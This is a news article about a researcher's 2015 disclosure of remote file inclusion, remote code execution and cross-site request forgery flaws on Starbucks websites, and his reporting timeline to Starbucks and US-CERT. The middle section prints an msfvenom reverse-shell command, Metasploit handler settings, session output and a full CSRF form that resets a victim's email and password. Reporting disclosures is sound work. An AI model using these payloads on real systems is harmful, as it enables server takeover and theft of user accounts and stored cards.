Starbucks critical flaws exposes it to phishing, remote code execution and leaking credit card details
Are you a Starbucks coffee lover? Have you registered yourself on Starbucks website with your credit card details? If you have, then you may want to play safe by changing your passwords now, as your banking details may be vulnerable to hackers. Hackers are hijacking consumers’ coffee accounts, draining the stored value of their cards, and then using Starbucks’ auto-reload function to hack consumers’ associated debit and credit cards.
Mohamed M. Fouad who is an information security consultant at SecureMisr and an Independent Security Researcher from Egypt, in his blogpost has mentioned that he found three critical vulnerabilities on Starbucks website that could have allowed hackers to gain access to your account in just one click. Payment history of the users are contained in the Starbucks store account.
These vulnerabilities could lead to very harmful impact on all users by forcibly changing user passwords, changing their store profile settings or adding alternative emails, and stealing users stored credit-cards. It can also perform remote code execution and phishing attack on users and on Starbucks servers.
The vulnerabilities that were discovered by Fouad were Remote Code Execution, Remote File Inclusion lead to Phishing Attacks and CSRF (Cross Site Request Forgery).
Remote File Inclusion
This vulnerability occurs when a hacker can inject file from any location into the attacked page and include it as a source code for parsing and execution, allowing to perform:
Code execution on the company’s web server.
Data theft/manipulation via Phishing attacks to steal account information of users that contain credit cards and payment orders information.
Vulnerable URL: https://quality.starbucks.com/admin/api/outside/proxy?url= <Payload Here>
Faoud created a poc for XSS via html page by inserting payload in URL parameter, so that it loads inside quality.starbuck domain page and executed it as screenshot below:
He was able to inject any script and it got executed in quality.starbuck domain, which was able to perform remote code execution on Starbucks server. He then created asp reverse_shell using msf venom by using below command :
msfvenom -p windows/x86/shell_reverse_tcp LHOST=<IP Address> LPORT=<Port to Connect On> -f asp > shell.asp
IP Address : He used his static IP address.
Port : He used port 80. and enabled IP forwarding in his router to port 80.
He uploaded his asp reverse_shell to his domain. Then, he used the http URL as below :
He used exploit/multi/handler in metasploit with payload windows/x86/reverse_shell_tcp
Then setting payload attributes :
– LHOST to his internal network ip address which configured in his router ip forwarding.
– LPORT : 80
– ExitOnSession : False
The exploit started after running above URL using asp reverse_shell, and he got a session opened.
[*] Sending stage (751104 bytes) to 18.104.22.168
[*] Sending stage (751104 bytes) to 22.214.171.124
[*] Meterpreter session 1 opened (192.168.1.105:80 -> 126.96.36.199:1385) at 2015-29-07 22:57:49 +0200
Stealing Starbucks Store Account Using CSRF (Cross-Site Request Forgery)
Using this method, a hacker can send malicious link to force victim to change user’s store account information including account password. The hacker can also steal user’s credit included in victim’s account, delete account or change victim’s email address.
URL : https://store.starbucks.com/
<form action=”https://store.starbucks.com/on/demandware.store/Sites-Starbucks-Site/default/MyAccount-EditProfileAjax” method=”post” name=”csrf”>
<input type=”hidden” name=”dwfrm_profile_customer_firstname” value=”attacker”><br>
<input type=”hidden” name=”dwfrm_profile_customer_lastname” value=”attacker”><br>
<input type=”hidden” name=”dwfrm_profile_customer_email” value=”email@example.com”><br>
<input type=”hidden” name=”dwfrm_profile_login_password” value=”hacked@2015″><br>
<input type=”hidden” name=”dwfrm_profile_login_passwordconfirm” value=”hacked@2015″><br>
<input type=”hidden” name=”dwfrm_profile_login_question” value=””><br>
<input type=”hidden” name=”dwfrm_profile_login_answer” value=””><br>
<input type=”hidden” name=”dwfrm_profile_customer_emailsource” value=”Website+-+Registration”><br>
<input type=”hidden” name=”newpwsubmitted” value=”true”><br>
Proof of Concept Video
To show the attack in work, Fauod has also provided a video demonstration as a Proof of Concept. You can watch the video given below:
Fauod had discovered the vulnerabilities on June 29, 2015, which was reported to Starbucks on the same day. However, he did not receive any response from the team.
In a white-hat style, Fouad reported the critical flaws to Starbucks twice but didn’t get any reply from the Starbucks security team. He then contacted the Starbucks customer support on Twitter on July 4, 2015, but did not receive any reply.
Fouad then reported the same flaws to US-CERT on July 1, 2015, which confirmed the vulnerabilities on August 20, 2015 stating that they were fixed by the Starbucks team nearly ten days ago.
Starbucks, who had started the bug bounty program just two months ago, has yet to reply to Fauad on his bug bounty and publication.